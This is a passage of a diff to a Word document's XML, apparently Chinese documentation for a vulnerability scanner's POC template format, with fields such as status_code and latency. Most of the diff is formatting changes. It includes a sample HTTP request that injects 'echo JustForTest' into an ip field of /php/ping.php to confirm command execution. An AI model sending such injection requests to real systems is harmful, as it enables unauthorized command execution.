               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1550,6 +1816,11 @@
             <w:tcW w:w="1555" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1564,6 +1835,11 @@
             <w:tcW w:w="6741" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1582,7 +1858,11 @@
             <w:tcW w:w="1555" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1596,7 +1876,6 @@
               </w:rPr>
               <w:t>able</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1604,6 +1883,11 @@
             <w:tcW w:w="6741" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1622,6 +1906,11 @@
             <w:tcW w:w="1555" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1642,6 +1931,11 @@
             <w:tcW w:w="6741" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1657,6 +1951,11 @@
             <w:tcW w:w="1555" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1677,6 +1976,11 @@
             <w:tcW w:w="6741" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1696,19 +2000,11 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t xml:space="preserve"> ,和</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>s</w:t>
+              <w:t xml:space="preserve"> ,和s</w:t>
             </w:r>
             <w:r>
               <w:t>tatus_code</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1721,6 +2017,11 @@
             <w:tcW w:w="1555" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1735,6 +2036,11 @@
             <w:tcW w:w="6741" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1745,12 +2051,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -1775,7 +2087,7 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -1790,6 +2102,11 @@
       <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1798,6 +2115,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1818,7 +2140,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1840,6 +2162,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1848,6 +2175,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1865,12 +2197,18 @@
         <w:t>()）</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="4"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -1897,27 +2235,17 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>codition</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>中，要以</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在codition中，要以</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1925,7 +2253,6 @@
         </w:rPr>
         <w:t>json</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1939,7 +2266,13 @@
         <w:t>分别是</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="af0"/>
@@ -1957,6 +2290,7 @@
           <w:p>
             <w:pPr>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
             </w:pPr>
@@ -1969,6 +2303,11 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:tab/>
               <w:t>“</w:t>
@@ -2011,6 +2350,11 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:tab/>
               <w:t>“</w:t>
@@ -2039,21 +2383,7 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>判断延时时间，多用于</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>延时注入</w:t>
+              <w:t>判断延时时间，多用于sql延时注入</w:t>
             </w:r>
             <w:r>
               <w:t>”</w:t>
@@ -2068,18 +2398,19 @@
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>“</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>status_code</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>”</w:t>
             </w:r>
@@ -2116,6 +2447,9 @@
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>“</w:t>
@@ -2152,6 +2486,7 @@
           <w:p>
             <w:pPr>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
@@ -2166,12 +2501,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="5"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -2208,7 +2549,7 @@
       <w:pPr>
         <w:pStyle w:val="6"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -2235,6 +2576,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>B</w:t>
       </w:r>
@@ -2246,6 +2592,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -2266,7 +2617,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2288,6 +2639,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2309,6 +2665,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2317,6 +2678,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:tab/>
       </w:r>
@@ -2346,6 +2712,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:tab/>
         <w:t>“</w:t>
@@ -2376,6 +2747,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2384,13 +2760,17 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>POC举例，下面是某个框架的命令执行漏洞，我们使其输出POC关键字</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2398,14 +2778,12 @@
         </w:rPr>
         <w:t>JustForTest</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>检测是否存在关键字，如是返回</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2413,7 +2791,6 @@
         </w:rPr>
         <w:t>JustForTest</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2436,123 +2813,122 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>POST /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ping.php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> HTTP/1.1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t>POST /php/ping.php HTTP/1.1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">Host: </w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t>Accept: application/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>json</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, text/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>javascript</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, */*; q=0.01</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Accept-Language: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>zh-CN,zh;q</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Accept-Encoding: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>gzip</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, deflate</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Content-Type: application/x-www-form-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>urlencoded</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>; charset=UTF-8</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">X-Requested-With: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept: application/json, text/javascript, */*; q=0.01</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Accept-Encoding: gzip, deflate</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>X-Requested-With: XMLHttpRequest</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Content-Length: 43</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>Connection: close</w:t>
             </w:r>
           </w:p>
-          <w:p/>
-          <w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">jsondata%5Btype%5D=99&amp;jsondata%5Bip%5D=echo </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2566,7 +2942,6 @@
               </w:rPr>
               <w:t>ustforTest</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2574,6 +2949,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
       </w:pPr>
@@ -2600,40 +2976,50 @@
             <w:tcW w:w="8296" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">    "body": "</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>JustForTest</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>",</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>status_code</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": 200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    "status_code": 200</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:t>}</w:t>
             </w:r>
@@ -2641,12 +3027,18 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="6"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -2673,6 +3065,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2681,6 +3078,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -2701,7 +3103,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2726,108 +3128,85 @@
       <w:pPr>
         <w:pStyle w:val="5"/>
         <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>1.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2 </w:t>
+        <w:t>latency</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>latency</w:t>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>延时</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>延时</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
         <w:t>）</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>测试</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>sql</w:t>
-      </w:r>
